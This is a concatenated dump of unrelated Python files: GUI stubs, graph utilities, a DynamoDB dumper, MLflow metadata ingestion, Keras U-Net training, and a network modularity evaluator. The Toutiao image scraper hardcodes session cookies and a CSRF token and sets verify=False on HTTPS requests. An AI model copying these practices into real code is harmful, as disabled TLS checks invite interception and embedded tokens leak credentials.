'\\n'\r\n 
self.com_log_text.insert(END, newline)\r\n self.com_log_text.see(tkinter.END)\r\n self.com_log_text.update()\r\n\r\n # handler for the Cancel button\r\n def com_cancel(self):\r\n pass\r\n\r\n # handler for the Run button\r\n def com_output(self):\r\n pass\r\n\r\n # worker threads that choose the code file, save the execution results and clear the code table\r\n\r\n # start a thread to choose a file\r\n def thread_file(self):\r\n thisthread = threading.Thread(target=self.file_choose)\r\n thisthread.start()\r\n\r\n # open the chosen file and show it in the interface\r\n def file_choose(self):\r\n pass\r\n\r\n # start a thread to save the execution results\r\n def thread_save(self):\r\n thisthread = threading.Thread(target=self.code_log_save)\r\n thisthread.start()\r\n\r\n # save the execution result log\r\n def code_log_save(self):\r\n pass\r\n\r\n # start a thread to clear the chosen file so a new one can be selected\r\n def thread_clear(self):\r\n thisthread = threading.Thread(target=self.file_clear)\r\n thisthread.start()\r\n\r\n # remove the chosen file and clear the parsed-code table\r\n def file_clear(self):\r\n pass\r\n\r\n\r\n# main thread\r\ndef start():\r\n init_window = Tk() # since the GUI is written as a class, create a window object and call the class methods to build the window and set up its widgets\r\n my_window = MY_GUI(init_window)\r\n my_window.set_init_window()\r\n init_window.mainloop()\r\n\r\n\r\nstart()\r\n","sub_path":"UsartTool_Thinker.py","file_name":"UsartTool_Thinker.py","file_ext":"py","file_size_in_byte":10572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"2646914","text":"# from heapq import heappop, heappush\n\n\ndef topo_sort(n, graph):\n indeg, idx = [0] * n, [0] * n\n for i in range(n):\n for e in graph[i]:\n indeg[e] += 1\n\n q, res = [], []\n for i in range(n):\n if indeg[i] == 0:\n q.append(i) # heappush(q, -i)\n\n nr = 0\n while q:\n res.append(q.pop()) # res.append(-heappop(q))\n idx[res[-1]], nr = nr, nr + 1\n for e in graph[res[-1]]:\n indeg[e] -= 1\n if indeg[e] == 0:\n q.append(e) # heappush(q, -e)\n\n return res, idx, nr == n\n","sub_path":"snippets/Graphs/topo_sort.py","file_name":"topo_sort.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"367812328","text":"\nimport os,sys\nimport boto3\nfrom pprint import pprint\n\nimport json\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../aws/')))\nimport db_access\n\n#-------------------------\n# For local dynamodb\n#-------------------------\nLOCAL_DYNAMODB_ENDPOINT = os.environ.get(\"LOCAL_DYNAMODB_ENDPOINT\", \"http://127.0.0.1:8000\")\ndynamodb = boto3.resource(\"dynamodb\", region_name=\"us-east-1\", endpoint_url=LOCAL_DYNAMODB_ENDPOINT)\n\n#-------------------------\n# connect to aws\n#-------------------------\n#dynamodb = boto3.session.Session(profile_name='tr-fr-sandbox').resource('dynamodb')\n\n\ndef dump_data(tbl_obj, out_file, max_size, batch_size=1000):\n fout = open(out_file, 'wt')\n (items, exclude_key) = db_access.scan_simp(tbl_obj, limit = batch_size, max_scan_size = max_size)\n if exclude_key:\n msg = \"more data are available...\"\n else:\n msg = \"all data have returned...\"\n print(\"Total returned items: {}, {}\".format(len(items), msg))\n\n print(\"Writing to file: {}\".format(out_file))\n for item in items:\n #print(type(item))\n #print(json.dumps(item))\n fout.write(json.dumps(item) + \"\\n\")\n \n fout.close()\n print(\"Done.\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"Usage:\")\n print(\"\\t{} table-name max_size [out_filename]\".format(sys.argv[0]))\n\n print(\"\\te.g. 
{} bba.data.data_tracking 1000 data_tracking.json\".format(sys.argv[0]))\n exit(0)\n \n tbl_name = sys.argv[1]\n max_size = int(sys.argv[2])\n out_file = \"../temp/\" + tbl_name + \".out.json\"\n if len(sys.argv) > 3: \n out_file = \"../temp/\" + sys.argv[3] \n \n print(\"Start to scan {}, and dump data to {}\".format(tbl_name, out_file))\n tbl_obj = dynamodb.Table(tbl_name)\n dump_data(tbl_obj, out_file, max_size)\n\n\n","sub_path":"python/aws_tools/dump_data.py","file_name":"dump_data.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"371022973","text":"import requests\nfrom urllib.parse import urlencode\nfrom requests import codes\nimport os\nfrom hashlib import md5\nfrom multiprocessing import Pool\nimport re\n\ndef get_page(offset, keyword):\n headers = {\n 'authority': 'www.toutiao.com',\n 'cookie': 'tt_webid=6746149885919299083; s_v_web_id=756728ee0426864fb694fd6a08859853; WEATHER_CITY=%E5%8C%97%E4%BA%AC; __tasessionId=yrohurhn91570710376983; tt_webid=6746149885919299083; csrftoken=4124891963a86f58c4180dde49e105f6',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',\n 'x-requested-with': 'XMLHttpRequest',\n }\n params = {\n 'aid': '24',\n 'app_name': 'web_search',\n 'offset': '0',\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': '20',\n 'en_qc': '1',\n 'cur_tab': '1',\n 'from': 'search_tab',\n 'pd': 'synthesis',\n }\n\n base_url = 'https://www.toutiao.com/api/search/content/?'\n url = base_url + urlencode(params)\n try:\n res = requests.get(url=url, headers=headers, verify=False)\n if codes.ok == res.status_code:\n return res.json()\n except requests.ConnectionError as e:\n print('Error: ', e.args)\n return None\n\ndef get_images(json):\n if json.get('data'):\n datas = json.get('data')\n for data in datas:\n if not data.get('title'):\n continue\n title = re.sub('[\\t]', '', data.get('title'))\n images = data.get('image_list')\n for image in images:\n if 'pgc-image' in image.get('url'):\n origin_image = re.sub('list.*?pgc-image', 'large/pgc-image', image.get('url'))\n else:\n origin_image = re.sub('list', 'large', image.get('url'))\n yield {\n 'image': origin_image,\n 'title': title,\n }\n\ndef save_image(item):\n if not item.get('image'):\n return\n img_path = os.path.join('image', item.get('title'))\n if not os.path.exists(img_path):\n os.makedirs(img_path)\n try:\n res = requests.get(item.get('image'))\n if codes.ok == res.status_code:\n file_path = os.path.join(img_path, '{file_name}.{file_suffix}'.format(\n file_name = md5(res.content).hexdigest(),\n file_suffix = 'jpg')\n )\n if not os.path.exists(file_path):\n with open(file_path, 'wb') as f:\n f.write(res.content)\n print('Dowloaded image: ', file_path)\n else:\n print('Already Downloaded image: ', file_path)\n except Exception as e:\n print('Error: ', e.args)\n\n\ndef main(offset):\n keyword = '街拍'\n json = get_page(offset, keyword)\n if json == None:\n return\n for image in get_images(json):\n save_image(image)\n\ndef run():\n page_start = 0\n page_end = 1\n groups = (x * 20 for x in range(page_start, page_end+1))\n\n pool = Pool()\n pool.map(main, groups)\n pool.close()\n pool.join()\n\nif __name__ == '__main__':\n run()\n","sub_path":"jiepai.py","file_name":"jiepai.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"325844182","text":"from dataclasses import dataclass, field\nfrom typing import Iterable, List\n\nimport mlflow.sklearn\nfrom datahub.configuration import ConfigModel\nfrom datahub.configuration.common import AllowDenyPattern\nfrom datahub.ingestion.api.common import PipelineContext\nfrom datahub.ingestion.api.source import Source, SourceReport\nfrom datahub.ingestion.source.metadata_common import MetadataWorkUnit\nfrom datahub.metadata import MLModelPropertiesClass\nfrom datahub.metadata.com.linkedin.pegasus2avro.common import VersionTag\nfrom datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import MLModelSnapshot\nfrom datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent\nfrom mlflow.entities import ViewType\n\n\nclass MlFlowConfig(ConfigModel):\n tracking_uri: str\n\n experiment_pattern: AllowDenyPattern = AllowDenyPattern(deny=[\"Default\"])\n path_pattern: str = 'model/model.pkl'\n\n\n@dataclass\nclass MlFlowSourceReport(SourceReport):\n filtered: List[str] = field(default_factory=list)\n\n def report_dropped(self, name: str) -> None:\n self.filtered.append(name)\n\n\nclass MlFlowSource(Source):\n config: MlFlowConfig\n\n def __init__(self, config: MlFlowConfig, ctx: PipelineContext):\n super().__init__(ctx)\n self.config = config\n self.mlflow_client = mlflow.tracking.MlflowClient(tracking_uri=self.config.tracking_uri)\n self.report = MlFlowSourceReport()\n\n @classmethod\n def create(cls, config_dict: dict, ctx: PipelineContext):\n config = MlFlowConfig.parse_obj(config_dict)\n return cls(config, ctx)\n\n def get_workunits(self) -> Iterable[MetadataWorkUnit]:\n platform = 'mlflow'\n env = 'PROD'\n experiments: List[MLModelPropertiesClass] = self.get_mlflow_objects(self.mlflow_client)\n for experiment in experiments:\n if self.config.experiment_pattern.allowed(experiment.name):\n mce = MetadataChangeEvent()\n mlmodel_snapshot = MLModelSnapshot()\n mlmodel_snapshot.urn = f\"urn:li:mlModel:(urn:li:dataPlatform:{platform},{experiment.name}_\" \\\n f\"{experiment.version.versionTag},{env})\"\n\n mlmodel_snapshot.aspects.append(experiment)\n\n mce.proposedSnapshot = mlmodel_snapshot\n\n wu = MetadataWorkUnit(id=f\"{experiment.name}_{experiment.version.versionTag}\", mce=mce)\n self.report.report_workunit(wu)\n yield wu\n else:\n self.report.report_dropped(experiment.name)\n\n def get_mlflow_objects(self, mlflow_client: mlflow.tracking.MlflowClient) -> List[MLModelPropertiesClass]:\n experiment_list = mlflow_client.list_experiments(view_type=ViewType.ACTIVE_ONLY)\n print(experiment_list)\n\n experiments_ids_list = list(map(lambda x: {'id': x.experiment_id, 'name': x.name}, iter(experiment_list)))\n experiments_metadata = []\n for experiment in experiments_ids_list:\n runs = mlflow_client.search_runs(experiment['id'])\n for run in runs:\n experiments_metadata.append(MLModelPropertiesClass(\n name=experiment['name'],\n date=run.info.end_time,\n hyperParameters=run.data.params,\n version=VersionTag(versionTag=run.info.run_id),\n metrics=run.data.metrics\n ))\n\n return experiments_metadata\n\n def get_report(self) -> MlFlowSourceReport:\n return self.report\n","sub_path":"metadata-ingestion/src/datahub/ingestion/source/mlflow.py","file_name":"mlflow.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126790114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 16 13:19:28 2017\n\n@author: fly\n\"\"\"\n\nfrom __future__ import 
print_function\n\nimport numpy as np\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Convolution2D, MaxPooling2D, UpSampling2D,Dropout,Deconvolution2D,BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as K\n#from keras.utils.vis_utils import model_to_dot, plot_model\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizers import SGD\n#from models import model_from_json\n#from data import load_train_data, load_test_data\n#import os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\n\nK.set_image_dim_ordering('th') # Theano dimension ordering in this code\n\nimg_rows = 256\nimg_cols = 256\n\nsmooth = 1\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return -dice_coef(y_true, y_pred)\n\n\ndef get_unet():\n inputs = Input((3, img_rows, img_cols))#3*512*512\n conv1_1 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(inputs)#64*512*512\n conv1_2 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(conv1_1)#64*512*512\n # B1=BatchNormalization()(conv1_2)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1_2)#32*59*59\n \n\n conv2_1 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(pool1)#64*57*57\n conv2_2 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(conv2_1)#64*55*55\n # B2=BatchNormalization()(conv2_2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2_2)#64*54*54\n \n\n conv3_1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(pool2)#128*53*53\n conv3_2 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(conv3_1)#128*51*51\n # B3=BatchNormalization()(conv3_2)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3_2)#128*50*50\n \n\n conv4_1 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(pool3)\n conv4_2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(conv4_1)#128*46*46\n # B4=BatchNormalization()(conv4_2)\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4_2)#256*45*45\n\n conv5_1 = Convolution2D(512, 3, 3, activation='relu', border_mode='same')(pool4)\n conv5_2 = Convolution2D(512, 3, 3, activation='relu', border_mode='same')(conv5_1)#512*41*41\n #B5=BatchNormalization()(conv5_2)\n \n up6 = merge([UpSampling2D(size=(2, 2))(conv5_2), conv4_2], mode='concat', concat_axis=1)\n conv6_1 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(up6)\n conv6_2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(conv6_1)\n # B6=BatchNormalization()(conv6_2)\n\n\n up7 = merge([UpSampling2D(size=(2, 2))(conv6_2), conv3_2], mode='concat', concat_axis=1)\n conv7_1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(up7)\n conv7 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(conv7_1)\n # B7=BatchNormalization()(conv7)\n\n\n up8 = merge([UpSampling2D(size=(2, 2))(conv7), conv2_2], mode='concat', concat_axis=1)\n conv8_1 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(up8)\n conv8 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(conv8_1)\n # B8=BatchNormalization()(conv8)\n\n\n up9 = merge([UpSampling2D(size=(2, 2))(conv8), conv1_2], mode='concat', concat_axis=1)\n conv9_1 = Convolution2D(32, 3, 3, activation='relu', 
border_mode='same')(up9)\n conv9 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(conv9_1)\n\n output = Convolution2D(1, 1, 1, activation='sigmoid',name='out_put0')(conv9)\n\n\n\n###summary every map\n model = Model(input=inputs, output=output)\n json_string = model.to_json()\n fh = open(\"model_cons.pb\", \"w\")\n fh.write(json_string)\n fh.close()\n \n # visualize model\n # plot_model(model, to_file='U_Net.png',show_shapes=True)\n sgd = SGD(lr=0.0001,decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='binary_crossentropy', metrics=[dice_coef])#'binary_crossentropy'loss_weights=[0.2,0.2,0.2,0.2,0.2,1.0]\n\n return model\n\n\ndef preprocess(imgs):\n imgs=imgs.reshape(imgs.shape[0],1,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\ndef preprocess3(imgs):\n imgs=imgs.reshape(imgs.shape[0],3,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\ndef preprocess1(imgs):\n imgs=imgs.reshape(imgs.shape[0],1,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\n\ndef train_and_predict1():\n print('-'*30)\n print('Loading and preprocessing train data...')\n print('-'*30)\n\n test_x = np.load('imgs_test.npy')\n test_y = np.load('imgs_mask_test.npy')\n test_x=(np.array(test_x))\n test_x = test_x.astype('float32')\n\n\n test_y=(np.array(test_y))/255.0\n test_x = preprocess3(test_x)\n test_y = preprocess1(test_y)\n test_y=test_y.astype('float32')\n\n imgs_train = np.load('imgs_train.npy')\n imgs_mask_train = np.load('imgs_mask_train.npy')\n\n imgs_train=(np.array(imgs_train))\n imgs_train = imgs_train.astype('float32')\n\n imgs_mask_train=(np.array(imgs_mask_train))/255.0\n imgs_mask_train=imgs_mask_train.astype('float32')\n\n imgs_train = preprocess3(imgs_train)\n imgs_mask_train = preprocess1(imgs_mask_train)\n\n\n print('trainsamples',imgs_train.shape)\n print('testsamples',test_x.shape)\n\n\n print('test_y',test_y.shape)\n print('trainsamples',imgs_mask_train.shape)\n\n model = get_unet()\n# model.load_weights('AugUnet1.hdf5')\n# model_checkpoint = ModelCheckpoint('test.hdf5', monitor='val_loss', save_best_only=True)\n model_checkpoint = ModelCheckpoint('test_model_1.hdf5', monitor='val_loss', save_best_only=True) \n#early_stopping = EarlyStopping(monitor='val_loss', patience=1)\n\n print('-'*30)\n print('Fitting model...')\n print('-'*30)\n\n hist= model.fit(imgs_train,imgs_mask_train, batch_size=8, nb_epoch=2000, verbose=2, shuffle=True,validation_data=[test_x,test_y],callbacks=[model_checkpoint])#[imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train]\n print(hist.history)\n\n\nif __name__ == '__main__':\n train_and_predict1()\n# model = get_unet()\n# model.load_weights('AugUnet1.hdf5')\n# model.save('new_Unet.hdf5')\n","sub_path":"U-net/test_unet.py","file_name":"test_unet.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"552537671","text":"import os\nimport numpy as np\nimport tensorflow as tf\nfrom config import Config\nfrom ops import tf_fun\nfrom glob import glob\nimport pandas as pd\n\n\nclass data_processing(object):\n def __init__(self):\n self.name = 'uw_challenge'\n self.output_name = 'uw_challenge'\n self.img_dir = 'imgs'\n self.image_data = '/media/data_cifs/Sheinberg_lab/data/cleaned_images/bold5000_cleaned.npy'\n self.neural_data = '/media/data_cifs/Sheinberg_lab/data/cleaned_images/bold5000_sqrt_of_numspk_responsiveCells_cleaned.csv'\n self.config = Config()\n self.im_size = [375, 375, 3] # 600, 600\n 
self.model_input_image_size = [224, 224, 3] # [107, 160, 3]\n self.output_size = [235]\n self.label_size = self.output_size\n self.default_loss_function = 'cce'\n self.score_metric = 'accuracy'\n self.store_z = False\n self.z_score_neurons = True\n self.normalize_im = False\n self.all_flips = True\n self.shuffle = True\n self.test_data_split = 50\n self.input_normalization = 'none' # 'zscore'\n self.preprocess = ['resize'] # ['resize_nn']\n self.meta = os.path.join('metadata', 'combined.npy')\n self.folds = {\n 'train': 'train',\n 'val': 'val',\n 'test': 'test'\n }\n self.targets = {\n 'image': tf_fun.bytes_feature,\n 'label': tf_fun.float_feature,\n }\n self.tf_dict = {\n 'image': tf_fun.fixed_len_feature(dtype='string'),\n 'label': tf_fun.fixed_len_feature(dtype='float32'),\n }\n self.tf_reader = {\n 'image': {\n 'dtype': tf.float32,\n 'reshape': self.im_size\n },\n 'label': {\n 'dtype': tf.float32,\n 'reshape': self.output_size\n }\n }\n\n def get_data(self, split_start=None, split_size=None):\n \"\"\"Get the names of files.\"\"\"\n if split_start is None:\n split_size, split_start = 50, 0 # Take first 50 images for validation\n image_data = np.load(self.image_data)\n\n # image_data = image_data[..., [2, 1, 0]]\n neural_data = pd.read_csv(self.neural_data)\n train_images = image_data[self.test_data_split:]\n test_images = image_data[:self.test_data_split]\n train_labels = neural_data.as_matrix()[self.test_data_split:, 1:] # First column is index\n test_labels = neural_data.as_matrix()[:self.test_data_split, 1:]\n\n # Create validation set\n val_idx = np.in1d(np.arange(len(train_images)), np.arange(split_start, split_start + split_size))\n val_images = train_images[val_idx]\n val_labels = train_labels[val_idx]\n # assert not np.sum(np.isnan(val_labels))\n train_images = train_images[~val_idx]\n train_labels = train_labels[~val_idx]\n if self.z_score_neurons:\n train_mean = np.nanmean(train_labels, axis=0, keepdims=True)\n train_std = np.nanstd(train_labels, axis=0, keepdims=True)\n np.savez(os.path.join('moments', self.output_name), mean=train_mean, std=train_std)\n # train_labels = (train_labels - train_mean) / train_std\n # val_labels = (val_labels - train_mean) / train_std\n train_labels[np.isnan(train_labels)] = 0. # -99.\n val_labels[np.isnan(val_labels)] = 0. # -99.\n\n # Build CV dict\n cv_files, cv_labels, cv_masks = {}, {}, {}\n cv_files[self.folds['train']] = train_images\n cv_files[self.folds['val']] = val_images\n cv_files[self.folds['test']] = test_images\n cv_labels[self.folds['train']] = train_labels\n cv_labels[self.folds['val']] = val_labels\n cv_labels[self.folds['test']] = test_labels\n cv_masks[self.folds['train']] = train_images\n cv_masks[self.folds['val']] = val_images\n cv_masks[self.folds['test']] = test_images\n return cv_files, cv_labels, cv_masks\n\n","sub_path":"datasets/ruobing_bold_5000.py","file_name":"ruobing_bold_5000.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"464043827","text":"#! 
/usr/bin/python3\n\nimport sys\nsys.path.append('../../')\nimport os\nimport signal\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ivy.std_api import *\nimport logging\n\nimport nephelae_paparazzi.pprzinterface as ppint\nimport nephelae_paparazzi.pprzinterface.messages as pmsg\nfrom nephelae_base.types import *\nfrom nephelae_mapping.database import SpatializedDatabase\nfrom nephelae_mapping.database import NephelaeDataServer\n\nfrom helpers.helpers import *\n\n\ndtbase = NephelaeDataServer()\n# dtbase.enable_periodic_save('output/database_perf01.neph', 60.0, True)\ndtbase.set_navigation_frame(pmsg.NavigationRef(\"100 NAVIGATION_REF 0.0 0.0 31 0.0\"))\ndtbase.navFrame.stamp = 0.0\n\nuavIds = ['100', '101', '102', '103', '104']\nvarPeriod= 5\nvarNames = ['var_'+str(i) for i in range(5*varPeriod)]\ngpsSig = 2000.0\ndataSig = 10.0\nN = 5*3600\nt = []\ntry:\n t0 = time.time()\n for n in range(N):\n # for n in range(10):\n if int(100 * n / N) == 100.0*n / N:\n t1 = time.time()\n print(\"Filling database... (\"+str(int(100*n/N))+\"% : \"+str(n)+\"/\"+str(N)+\")\")\n print(\" - \", format(1000000.0*(t1 - t0) / (len(uavIds)*(len(varNames) + 1)*N) * 100.0, \".2f\"),\n \"us per insert. (total : \", n*(len(uavIds)*(len(varNames) + 1)), \"inserted)\")\n t.append(1000000.0*(t1 - t0) / (len(uavIds)*(len(varNames) + 1)*N) * 100.0)\n t0 = t1\n for uavId in uavIds:\n gpsx = random.gauss(0.0, gpsSig)\n gpsy = random.gauss(0.0, gpsSig)\n gpsz = random.gauss(0.0, gpsSig)\n gps = pmsg.Gps(uavId+\" GPS 3 \"+str(int(gpsx))+' '+str(int(gpsy))+' 0 '+str(int(gpsz))+\n ' 0 0 0 0 31 0')\n gps.stamp = n\n dtbase.add_gps(gps)\n \n if n % varPeriod == 0:\n for var in varNames:\n sample = SensorSample(var, uavId, n, gps - dtbase.navFrame, \n [random.gauss(0.0, dataSig)])\n dtbase.add_sample(sample)\n \nfinally: \n fig, axes = plt.subplots(1,1)\n axes.plot(np.linspace(0, (len(uavIds)*(len(varNames) + 1)*N), len(t)) ,t, label=\"insert time\")\n axes.set_xlabel(\"database size\")\n axes.set_ylabel(\"insert time (us)\")\n axes.grid()\n plt.show(block=False)\n # dtbase.disable_periodic_save()\n # dtbase.save('output/database_perf02.neph', True)\n dtbase.save('output/database_perf03.neph', True)\n\n\n\n\n\n","sub_path":"tests/database/database_perf_build01.py","file_name":"database_perf_build01.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583237704","text":"import json\nfrom pathlib import Path\n\n_file = 'check_the_path_of_input.json'\n_file = Path(_file)\n\n\nclass RpInput(object):\n\tdef __init__(self):\n\t\tself.port_rp = {\n\t\t\t'file': 'c:/users/tt/desktop/smf.rar',\n\t\t\t'ele_file': 'c:/users/tt/desktop/ele.txt',\n\t\t\t'dict_file': 'c:/users/tt/desktop/dict.txt',\n\t\t\t'log_file': 'c:/users/tt/desktop/log.txt',\n\t\t\t'max_length': '32'\n\t}\n\ndict_template = RpInput().__dict__;\n\n\nif _file.is_file() == True and _file.exists()==True:\n\tprint('file already exists, check it again please.')\nelse:\n\twith open(_file,'w',encoding='utf-8') as w:\n\t\tjson.dump(dict_template,w)\n\n","sub_path":"daily_codes/rar_password_recall/gen_input_ini.py","file_name":"gen_input_ini.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491867682","text":"\"\"\"\nGiven 2D xy_embedding_csv file, evaluate the modularity,\nWe want dense connection between nodes within modules but sparse connection 
between modules\nHigh modularity corresponds to good community structure\n\nThe bash input should be map_directory, xy_embeddings_csv, cluster_groups_csv,\nand network construction method 'nn' or 'distance'\n\nTo install igraph\nbrew install cairo\nbrew install pkg-config\nbrew install igraph\nsudo pip install python-igraph\n\nAuthor: Yuren 'Rock' Pang\n\"\"\"\nimport argparse\nimport math\nfrom sklearn.neighbors import NearestNeighbors\nimport pandas as pd\nfrom igraph import *\nimport logging\nimport json\n\n\ndef preprocess(x_y_embeddings_csv):\n df = x_y_embeddings_csv\n feature_space = []\n indices_to_id = {}\n\n for index, row in df.iterrows():\n feature_space.append([row['x'], row['y']])\n indices_to_id[index] = int(row['article_id'])\n\n return feature_space, indices_to_id\n\n\ndef find_k_near_neighbors(feature_space, k=15):\n \"\"\"\n Given a 2-D csv file, find the k-nearest neighbors with 2 output csv file\n indices_dic: article_id : neighbors_with_id\n distance_dic: article_id : neighbors_distance\n\n :param x_y_embeddings_csv:\n :param k:\n :return:\n \"\"\"\n nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(feature_space)\n\n return nbrs.kneighbors(feature_space) # the output is two lists: distance and indices\n\n\ndef find_neighbors_within_d_distance(feature_space, d = 3):\n distances_lst = []\n neighbors_lst = []\n\n for center in range(len(feature_space)):\n center_x = feature_space[center][0]\n center_y = feature_space[center][1]\n\n distances = [0]\n neighbors = [center]\n\n for point in range(len(feature_space)):\n if center == point:\n continue\n x = feature_space[point][0]\n y = feature_space[point][1]\n a2b2 = (x-center_x) * (x-center_x) + (y-center_y) * (y-center_y)\n if a2b2 <= d * d:\n neighbors.append(point)\n distances.append(math.sqrt(a2b2))\n neighbors_lst.append(neighbors)\n distances_lst.append(distances)\n\n return distances_lst, neighbors_lst\n\n\ndef build_network(distances_lst, neighbors_lst, indices_to_id):\n edges = []\n weights = []\n\n for node in range(0, len(neighbors_lst)): # default id, not the article id !!\n node_list = neighbors_lst[node]\n for neighbor in range(1, len(node_list)):\n if len(node_list) <= 1:\n continue\n else:\n edges.append(tuple((node_list[0], node_list[neighbor])))\n weights.append(distances_lst[node][neighbor])\n G = Graph()\n G.add_vertices(len(neighbors_lst))\n\n names = [indices_to_id[index] for index in G.vs.indices]\n G.vs['name'] = names\n\n G.add_edges(edges)\n G.es['weight'] = weights\n\n return G.simplify(combine_edges=max)\n\n\ndef calc_modularity(Graph, cluster_groups_csv):\n \"\"\"\n Here We could choose 9 different measurement to test the modularity score\n The higher the better the cluster we produce\n Reference: https://yoyoinwanderland.github.io/2017/08/08/Community-Detection-in-Python/\n \"\"\"\n cluster_groups = cluster_groups_csv\n country = cluster_groups['country'].tolist()\n\n #vertex_clustering = Graph.community_multilevel(weights='weight')\n return Graph.modularity(country)\n\n\ndef main(xy_embedding_csv, cluster_groups_csv, method='nn'):\n xy_embeddings_csv = pd.read_csv(args.xy_embeddings_csv)\n feature_space, indices_to_id = preprocess(xy_embeddings_csv)\n\n if method == 'nn':\n distance_lst, indices_lst = find_k_near_neighbors(feature_space)\n else:\n distance_lst, indices_lst = find_neighbors_within_d_distance(feature_space)\n\n G = build_network(distance_lst, indices_lst, indices_to_id)\n mod_score = calc_modularity(G, cluster_groups_csv)\n print(str(json.dumps({\"Modularity 
Score: %.6f\": mod_score})))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Augment the original article vectors with label matrix or '\n 'cluster matrix.')\n parser.add_argument('--experiment', required=True)\n parser.add_argument('--xy_embeddings_csv', required=True)\n parser.add_argument('--method', required=True)\n parser.add_argument('--cluster_groups_csv', required=True)\n args = parser.parse_args()\n cluster_vectors = pd.read_csv(args.cluster_groups_csv)\n main(args.xy_embeddings_csv, cluster_vectors, args.method)\n","sub_path":"cartograph/evaluation/modularity_evaluator.py","file_name":"modularity_evaluator.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62981315","text":"from sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nimport model_all\nimport data_read_all\nimport matplotlib.pyplot as plt\nfrom keras import callbacks\n\n\n# Global Constants\nNB_CLASS = 20\nIM_WIDTH = 150\nIM_HEIGHT = 150\ntrain_root = './train_dir/train'\nvaildation_root = './train_dir/test'\ntest_root = './train_dir/test'\nbatch_size = 32\nEPOCH = 5\nflag_enhance = True\nCHANNELS = 3\nflag_color = True\nflag_continue = False\nmodel_name = './out_model/inception_resnet_v1_0.5122749591322461.h5'\n\nsgd = optimizers.SGD(lr=0.01, momentum=0.9, nesterov=True)\nadadelta = optimizers.Adadelta(lr=0.01, rho=0.95, epsilon=1e-06)\n\nnb_filter_reduction_factor = 8\n\n\nclass LossHistory(callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = {'batch': [], 'epoch': []}\n self.accuracy = {'batch': [], 'epoch': []}\n self.val_loss = {'batch': [], 'epoch': []}\n self.val_acc = {'batch': [], 'epoch': []}\n\n def on_batch_end(self, batch, logs={}):\n self.losses['batch'].append(logs.get('loss'))\n self.accuracy['batch'].append(logs.get('acc'))\n self.val_loss['batch'].append(logs.get('val_loss'))\n self.val_acc['batch'].append(logs.get('val_acc'))\n\n def on_epoch_end(self, batch, 